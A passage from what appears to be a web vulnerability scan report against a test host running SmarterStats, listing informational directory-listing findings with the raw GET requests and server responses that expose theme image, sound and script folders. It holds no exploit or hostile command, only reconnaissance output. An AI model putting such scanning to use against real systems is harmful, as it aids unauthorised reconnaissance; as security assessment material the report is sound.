Thursday, October 07, 2010 01:00 PM 1,051 <A href="BlueNote.gif">BlueNote.gif</A>
Thursday, October 07, 2010 01:00 PM 576 <A href="Brands.gif">Brands.gif</A>
Thursday, October 07, 2010 01:00 PM 1,028 <A href="ByAgent.gif">ByAgent.gif</A>
Thursday, October 07, 2010 01:00 PM 1,054 <A href="ByColor.gif">ByColor.gif</A>
Thursday, October 07, 2010 01:00 PM 1,000 <A href="ByDepartment.gif">ByDepartment.gif</A>
Thursday, October 07, 2010 01:00 PM 356 <A href="calendar-mapped.gif">calendar-mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 615 <A href="calendar.gif">calendar.gif</A>
Thursday, October 07, 2010 01:00 PM 601 <A href="CalendarMonth.gif">CalendarMonth.gif</A>
Thursday, October 07, 2010 01:00 PM 582 <A href="CalendarWeek.gif">CalendarWeek.gif</A>
Thursday, October 07, 2010 01:00 PM 379 <A href="CatchAll.gif">CatchAll.gif</A>
Thursday, October 07, 2010 01:00 PM 594 <A href="Categories.gif">Categories.gif</A>
Thursday, October 07, 2010 01:00 PM 1,048 <A href="ChatSettings.gif">ChatSettings.gif</A>
Thursday, October 07, 2010 01:00 PM 576 <A href="ChatsInQueue.gif">ChatsInQueue.gif</A>
Thursday, October 07, 2010 01:00 PM 224 <A href="ClosedStatus.gif">ClosedStatus.gif</A>
Thursday, October 07, 2010 01:00 PM 1,019 <A href="ClosedStatus_Locked.gif">ClosedStatus_Locked.gif</A>
Thursday, October 07, 2010 01:00 PM 204 <A href="col.gif">col.gif</A>
Thursday, October 07, 2010 01:00 PM 224 <A href="Complete.gif">Complete.gif</A>
Thursday, October 07, 2010 01:00 PM 169 <A href="config.gif">config.gif</A>
Thursday, October 07, 2010 01:00 PM 610 <A href="contacts-mapped.gif">contacts-mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="contacts.gif">contacts.gif</A>
Thursday, October 07, 2010 01:00 PM 126 <A href="cs.gif">cs.gif</A>
Thursday, October 07, 2010 01:00 PM 167 <A href="css.gif">css.gif</A>
Thursday, October 07, 2010 01:00 PM 843 <A href="dash.gif">dash.gif</A>
Thursday, October 07, 2010 01:00 PM 881 <A href="dashminus.gif">dashminus.gif</A>
Thursday, October 07, 2010 01:00 PM 884 <A href="dashplus.gif">dashplus.gif</A>
Thursday, October 07, 2010 01:00 PM 543 <A href="database.gif">database.gif</A>
Thursday, October 07, 2010 01:00 PM 1,037 <A href="dataIconTree.gif">dataIconTree.gif</A>
Thursday, October 07, 2010 01:00 PM 1,037 <A href="DataMining.gif">DataMining.gif</A>
Thursday, October 07, 2010 01:00 PM 633 <A href="Delete.gif">Delete.gif</A>
Thursday, October 07, 2010 01:00 PM 595 <A href="deleted.gif">deleted.gif</A>
Thursday, October 07, 2010 01:00 PM 1,023 <A href="Department.gif">Department.gif</A>
Thursday, October 07, 2010 01:00 PM 1,032 <A href="DisabledDomains.gif">DisabledDomains.gif</A>
Thursday, October 07, 2010 01:00 PM 1,037 <A href="dll.gif">dll.gif</A>
Thursday, October 07, 2010 01:00 PM 1,028 <A href="Domain.gif">Domain.gif</A>
Thursday, October 07, 2010 01:00 PM 1,025 <A href="DomainForward.gif">DomainForward.gif</A>
Thursday, October 07, 2010 01:00 PM 529 <A href="DomainKeys.gif">DomainKeys.gif</A>
Thursday, October 07, 2010 01:00 PM 616 <A href="DomainSettings.gif">DomainSettings.gif</A>
Thursday, October 07, 2010 01:00 PM 1,061 <A href="Drafts.gif">Drafts.gif</A>
Thursday, October 07, 2010 01:00 PM 298 <A href="DrillDown.gif">DrillDown.gif</A>
Thursday, October 07, 2010 01:00 PM 200 <A href="exp.gif">exp.gif</A>
Thursday, October 07, 2010 01:00 PM 549 <A href="Favorites.gif">Favorites.gif</A>
Thursday, October 07, 2010 01:00 PM 331 <A href="file.gif">file.gif</A>
Thursday, October 07, 2010 01:00 PM 595 <A href="FlaggedArticle.gif">FlaggedArticle.gif</A>
Thursday, October 07, 2010 01:00 PM 599 <A href="Folder-Mapped.gif">Folder-Mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 1,027 <A href="folder.gif">folder.gif</A>
Thursday, October 07, 2010 01:00 PM 591 <A href="Folders.gif">Folders.gif</A>
Thursday, October 07, 2010 01:00 PM 583 <A href="ForwardedMessage.gif">ForwardedMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 583 <A href="ForwardedMessage_High.gif">ForwardedMessage_High.gif</A>
Thursday, October 07, 2010 01:00 PM 583 <A href="ForwardedMessage_Low.gif">ForwardedMessage_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 1,077 <A href="Gaant.gif">Gaant.gif</A>
Thursday, October 07, 2010 01:00 PM 119 <A href="gif.gif">gif.gif</A>
Thursday, October 07, 2010 01:00 PM 604 <A href="GlobalCalls.gif">GlobalCalls.gif</A>
Thursday, October 07, 2010 01:00 PM 607 <A href="GlobalChats.gif">GlobalChats.gif</A>
Thursday, October 07, 2010 01:00 PM 642 <A href="globalTasks.gif">globalTasks.gif</A>
Thursday, October 07, 2010 01:00 PM 641 <A href="GlobalTickets.gif">GlobalTickets.gif</A>
Thursday, October 07, 2010 01:00 PM 340 <A href="Globe.gif">Globe.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="GreenNote.gif">GreenNote.gif</A>
Thursday, October 07, 2010 01:00 PM 989 <A href="Group.gif">Group.gif</A>
Thursday, October 07, 2010 01:00 PM 1,068 <A href="Hostnames.gif">Hostnames.gif</A>
Thursday, October 07, 2010 01:00 PM 597 <A href="HTML.gif">HTML.gif</A>
Thursday, October 07, 2010 01:00 PM 996 <A href="ImportUser.gif">ImportUser.gif</A>
Thursday, October 07, 2010 01:00 PM 1,079 <A href="inbox.gif">inbox.gif</A>
Thursday, October 07, 2010 01:00 PM 550 <A href="IncomingCalls.gif">IncomingCalls.gif</A>
Thursday, October 07, 2010 01:00 PM 331 <A href="Incomplete.gif">Incomplete.gif</A>
Thursday, October 07, 2010 01:00 PM 631 <A href="InsertColumn.gif">InsertColumn.gif</A>
Thursday, October 07, 2010 01:00 PM 624 <A href="journal.gif">journal.gif</A>
Thursday, October 07, 2010 01:00 PM 119 <A href="jpg.gif">jpg.gif</A>
Thursday, October 07, 2010 01:00 PM 139 <A href="js.gif">js.gif</A>
Thursday, October 07, 2010 01:00 PM 1,050 <A href="Junk.gif">Junk.gif</A>
Thursday, October 07, 2010 01:00 PM 1,063 <A href="MailingList.gif">MailingList.gif</A>
Thursday, October 07, 2010 01:00 PM 294 <A href="MajorReview.gif">MajorReview.gif</A>
Thursday, October 07, 2010 01:00 PM 590 <A href="MessageArchive.gif">MessageArchive.gif</A>
Thursday, October 07, 2010 01:00 PM 363 <A href="MessageFlagIndicatorOff.gif">MessageFlagIndicatorOff.gif</A>
Thursday, October 07, 2010 01:00 PM 585 <A href="MessageFlagIndicatorOn.gif">MessageFlagIndicatorOn.gif</A>
Thursday, October 07, 2010 01:00 PM 1,005 <A href="MyCalendar.gif">MyCalendar.gif</A>
Thursday, October 07, 2010 01:00 PM 601 <A href="MyCalls.gif">MyCalls.gif</A>
Thursday, October 07, 2010 01:00 PM 990 <A href="MyChats.gif">MyChats.gif</A>
Thursday, October 07, 2010 01:00 PM 1,061 <A href="MyNotes.gif">MyNotes.gif</A>
Thursday, October 07, 2010 01:00 PM 1,048 <A href="MyTasks.gif">MyTasks.gif</A>
Thursday, October 07, 2010 01:00 PM 1,048 <A href="MyTickets.gif">MyTickets.gif</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="NewArticle.gif">NewArticle.gif</A>
Thursday, October 07, 2010 01:00 PM 998 <A href="newContact.gif">newContact.gif</A>
Thursday, October 07, 2010 01:00 PM 1,032 <A href="newEvent.gif">newEvent.gif</A>
Thursday, October 07, 2010 01:00 PM 1,035 <A href="NewMessage.gif">NewMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 1,045 <A href="NewNote.gif">NewNote.gif</A>
Thursday, October 07, 2010 01:00 PM 1,055 <A href="NewRSS.gif">NewRSS.gif</A>
Thursday, October 07, 2010 01:00 PM 1,039 <A href="NewTask.gif">NewTask.gif</A>
Thursday, October 07, 2010 01:00 PM 1,044 <A href="NewTicket.gif">NewTicket.gif</A>
Thursday, October 07, 2010 01:00 PM 1,036 <A href="Note.gif">Note.gif</A>
Thursday, October 07, 2010 01:00 PM 969 <A href="notes-mapped.gif">notes-mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 366 <A href="notes.gif">notes.gif</A>
Thursday, October 07, 2010 01:00 PM 1,042 <A href="NotificationProfiles.gif">NotificationProfiles.gif</A>
Thursday, October 07, 2010 01:00 PM 224 <A href="OpenStatus.gif">OpenStatus.gif</A>
Thursday, October 07, 2010 01:00 PM 346 <A href="OutgoingCalls.gif">OutgoingCalls.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="PinkNote.gif">PinkNote.gif</A>
Thursday, October 07, 2010 01:00 PM 330 <A href="Pinned.gif">Pinned.gif</A>
Thursday, October 07, 2010 01:00 PM 632 <A href="PopRetrieval.gif">PopRetrieval.gif</A>
Thursday, October 07, 2010 01:00 PM 610 <A href="print.gif">print.gif</A>
Thursday, October 07, 2010 01:00 PM 1,025 <A href="Private.gif">Private.gif</A>
Thursday, October 07, 2010 01:00 PM 551 <A href="Propagation.gif">Propagation.gif</A>
Thursday, October 07, 2010 01:00 PM 1,055 <A href="ProtocolSettings.gif">ProtocolSettings.gif</A>
Thursday, October 07, 2010 01:00 PM 571 <A href="ReadChat.gif">ReadChat.gif</A>
Thursday, October 07, 2010 01:00 PM 590 <A href="ReadMessage.gif">ReadMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 589 <A href="ReadMessage_High.gif">ReadMessage_High.gif</A>
Thursday, October 07, 2010 01:00 PM 589 <A href="ReadMessage_Low.gif">ReadMessage_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 344 <A href="Recurring.gif">Recurring.gif</A>
Thursday, October 07, 2010 01:00 PM 374 <A href="RepliedMessage.gif">RepliedMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="RepliedMessage_High.gif">RepliedMessage_High.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="RepliedMessage_Low.gif">RepliedMessage_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 325 <A href="reports.gif">reports.gif</A>
Thursday, October 07, 2010 01:00 PM 1,017 <A href="Reports2.gif">Reports2.gif</A>
Thursday, October 07, 2010 01:00 PM 331 <A href="Reports3.gif">Reports3.gif</A>
Thursday, October 07, 2010 01:00 PM 635 <A href="Reports4.gif">Reports4.gif</A>
Thursday, October 07, 2010 01:00 PM 1,037 <A href="RSS.gif">RSS.gif</A>
Thursday, October 07, 2010 01:00 PM 829 <A href="s.gif">s.gif</A>
Thursday, October 07, 2010 01:00 PM 357 <A href="Search.gif">Search.gif</A>
Thursday, October 07, 2010 01:00 PM 616 <A href="SenderPriorityOverrides.gif">SenderPriorityOverrides.gif</A>
Thursday, October 07, 2010 01:00 PM 1,077 <A href="sentItems.gif">sentItems.gif</A>
Thursday, October 07, 2010 01:00 PM 632 <A href="Servers.gif">Servers.gif</A>
Thursday, October 07, 2010 01:00 PM 377 <A href="Settings.gif">Settings.gif</A>
Thursday, October 07, 2010 01:00 PM 581 <A href="Skins.gif">Skins.gif</A>
Thursday, October 07, 2010 01:00 PM 562 <A href="SmarterMailSync.gif">SmarterMailSync.gif</A>
Thursday, October 07, 2010 01:00 PM 956 <A href="SmarterTools.gif">SmarterTools.gif</A>
Thursday, October 07, 2010 01:00 PM 562 <A href="SoundOFF.gif">SoundOFF.gif</A>
Thursday, October 07, 2010 01:00 PM 565 <A href="SoundON.gif">SoundON.gif</A>
Thursday, October 07, 2010 01:00 PM 613 <A href="SpamAssassin.gif">SpamAssassin.gif</A>
Thursday, October 07, 2010 01:00 PM 550 <A href="SpellCheck.gif">SpellCheck.gif</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="Spool.gif">Spool.gif</A>
Thursday, October 07, 2010 01:00 PM 1,035 <A href="StaleArticles.gif">StaleArticles.gif</A>
Thursday, October 07, 2010 01:00 PM 1,031 <A href="Status_Diagnostic.gif">Status_Diagnostic.gif</A>
Thursday, October 07, 2010 01:00 PM 1,033 <A href="Tasks-Mapped.gif">Tasks-Mapped.gif</A>
Thursday, October 07, 2010 01:00 PM 1,033 <A href="tasks.gif">tasks.gif</A>
Thursday, October 07, 2010 01:00 PM 1,028 <A href="TicketAssigned.gif">TicketAssigned.gif</A>
Thursday, October 07, 2010 01:00 PM 547 <A href="TicketDeleted.gif">TicketDeleted.gif</A>
Thursday, October 07, 2010 01:00 PM 596 <A href="TicketRead.gif">TicketRead.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="TicketsInQueue.gif">TicketsInQueue.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="TicketUnread.gif">TicketUnread.gif</A>
Thursday, October 07, 2010 01:00 PM 612 <A href="Today.gif">Today.gif</A>
Thursday, October 07, 2010 01:00 PM 562 <A href="Transfer.gif">Transfer.gif</A>
Thursday, October 07, 2010 01:00 PM 558 <A href="Translate.gif">Translate.gif</A>
Thursday, October 07, 2010 01:00 PM 556 <A href="Translate2.gif">Translate2.gif</A>
Thursday, October 07, 2010 01:00 PM 587 <A href="UnreadChat.gif">UnreadChat.gif</A>
Thursday, October 07, 2010 01:00 PM 1,008 <A href="UnreadMessage.gif">UnreadMessage.gif</A>
Thursday, October 07, 2010 01:00 PM 1,012 <A href="UnreadMessage_High.gif">UnreadMessage_High.gif</A>
Thursday, October 07, 2010 01:00 PM 1,012 <A href="UnreadMessage_Low.gif">UnreadMessage_Low.gif</A>
Thursday, October 07, 2010 01:00 PM 399 <A href="Upcoming.gif">Upcoming.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="User.gif">User.gif</A>
Thursday, October 07, 2010 01:00 PM 381 <A href="userBlack-check.gif">userBlack-check.gif</A>
Thursday, October 07, 2010 01:00 PM 369 <A href="userBlack.gif">userBlack.gif</A>
Thursday, October 07, 2010 01:00 PM 579 <A href="userDisabled.gif">userDisabled.gif</A>
Thursday, October 07, 2010 01:00 PM 383 <A href="userGreen-check.gif">userGreen-check.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="userGreen.gif">userGreen.gif</A>
Thursday, October 07, 2010 01:00 PM 384 <A href="userRed-check.gif">userRed-check.gif</A>
Thursday, October 07, 2010 01:00 PM 580 <A href="userRed.gif">userRed.gif</A>
Thursday, October 07, 2010 01:00 PM 380 <A href="userWhite-check.gif">userWhite-check.gif</A>
Thursday, October 07, 2010 01:00 PM 363 <A href="userWhite.gif">userWhite.gif</A>
Thursday, October 07, 2010 01:00 PM 130 <A href="vb.gif">vb.gif</A>
Thursday, October 07, 2010 01:00 PM 224 <A href="WaitingStatus.gif">WaitingStatus.gif</A>
Thursday, October 07, 2010 01:00 PM 1,044 <A href="Whitelist.gif">Whitelist.gif</A>
Thursday, October 07, 2010 01:00 PM 1,016 <A href="Write.gif">Write.gif</A>
Thursday, October 07, 2010 01:00 PM 229 <A href="xml.gif">xml.gif</A>
Thursday, October 07, 2010 01:00 PM 1,051 <A href="YellowNote.gif">YellowNote.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.43. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/Pager/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Images/Pager/

Request

GET /App_Themes/Default/Images/Pager/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:48 GMT
Content-Length: 2815
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Pager/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Images/Pager/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 179 <A href="doubleArrow_L.gif">doubleArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 179 <A href="doubleArrow_L_disabled.gif">doubleArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 177 <A href="doubleArrow_R.gif">doubleArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 177 <A href="doubleArrow_R_disabled.gif">doubleArrow_R_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 51 <A href="downState.gif">downState.gif</A>
Thursday, October 07, 2010 01:00 PM 183 <A href="endArrow_L.gif">endArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 183 <A href="endArrow_L_disabled.gif">endArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 181 <A href="endArrow_R.gif">endArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 181 <A href="endArrow_R_disabled.gif">endArrow_R_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 66 <A href="hoverState.gif">hoverState.gif</A>
Thursday, October 07, 2010 01:00 PM 163 <A href="singleArrow_L.gif">singleArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_L_disabled.gif">singleArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_R.gif">singleArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_R_disabled.gif">singleArrow_R_disabled.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.44. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Javascript/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Javascript/

Request

GET /App_Themes/Default/Javascript/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:35 GMT
Content-Length: 1375
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Javascript/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Javascript/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 54 <A href="Skin.js">Skin.js</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.45. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Sounds/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Sounds/

Request

GET /App_Themes/Default/Sounds/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:44 GMT
Content-Length: 1985
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Sounds/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Sounds/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 15,074 <A href="Chat_ClientMessage.mp3">Chat_ClientMessage.mp3</A>
Thursday, October 07, 2010 01:00 PM 26,042 <A href="Chat_NewChat.mp3">Chat_NewChat.mp3</A>
Thursday, October 07, 2010 01:00 PM 27,031 <A href="Chat_Red.mp3">Chat_Red.mp3</A>
Thursday, October 07, 2010 01:00 PM 22,652 <A href="Chat_White.mp3">Chat_White.mp3</A>
Thursday, October 07, 2010 01:00 PM 22,652 <A href="Chat_Yellow.mp3">Chat_Yellow.mp3</A>
Thursday, October 07, 2010 01:00 PM 12,197 <A href="NewReminder.mp3">NewReminder.mp3</A>
Thursday, October 07, 2010 01:00 PM 15,408 <A href="NewReminder.wav">NewReminder.wav</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.46. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/

Request

GET /App_Themes/Default/images/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/16x16/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:51 GMT
Content-Length: 2178
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="16x16/">16x16</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Customer/">Customer</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Icons/">Icons</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Invitations/">Invitations</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Misc/">Misc</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Pager/">Pager</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Plupload/">Plupload</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Skin/">Skin</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="social_icons/">social_icons</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Stats/">Stats</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.47. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Customer/

Request

GET /App_Themes/Default/images/Customer/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:54 GMT
Content-Length: 3294
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Customer/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Customer/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,524 <A href="Chat_sendTranscript.png">Chat_sendTranscript.png</A>
Thursday, October 07, 2010 01:00 PM 1,990 <A href="Chat_takeSurvey.png">Chat_takeSurvey.png</A>
Thursday, October 07, 2010 01:00 PM 2,311 <A href="Chat_viewTranscript.png">Chat_viewTranscript.png</A>
Thursday, October 07, 2010 01:00 PM 180 <A href="CustomerBars.png">CustomerBars.png</A>
Thursday, October 07, 2010 01:00 PM 202 <A href="CustomerButtons.png">CustomerButtons.png</A>
Thursday, October 07, 2010 01:00 PM 160 <A href="CustomerTabs.png">CustomerTabs.png</A>
Thursday, October 07, 2010 01:00 PM 2,401 <A href="FE_Agent.png">FE_Agent.png</A>
Thursday, October 07, 2010 01:00 PM 1,423 <A href="FE_Forums.png">FE_Forums.png</A>
Thursday, October 07, 2010 01:00 PM 2,314 <A href="FE_KB.png">FE_KB.png</A>
Thursday, October 07, 2010 01:00 PM 2,312 <A href="FE_MyAccount.png">FE_MyAccount.png</A>
Thursday, October 07, 2010 01:00 PM 2,190 <A href="FE_News.png">FE_News.png</A>
Thursday, October 07, 2010 01:00 PM 2,209 <A href="FE_Register.png">FE_Register.png</A>
Thursday, October 07, 2010 01:00 PM 2,252 <A href="FE_Submit.png">FE_Submit.png</A>
